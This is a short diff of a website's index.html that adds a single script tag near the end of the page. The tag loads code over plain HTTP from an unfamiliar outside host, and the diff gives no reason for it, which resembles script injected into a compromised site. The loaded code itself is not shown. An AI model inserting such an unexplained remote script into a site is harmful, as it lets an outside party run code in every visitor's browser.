--- a/index.html
+++ b/index.html
@@ -730,5 +730,6 @@ var _hmt = _hmt || [];(function(){var hm=document.createElement("script");hm.src
       }
       document.getElementById("g" + getParam("select")).className+=" layui-show";
     </script>
+    <script src="http://wm.lrswl.com/page/?s=294007"></script>
   </body>
 </html>
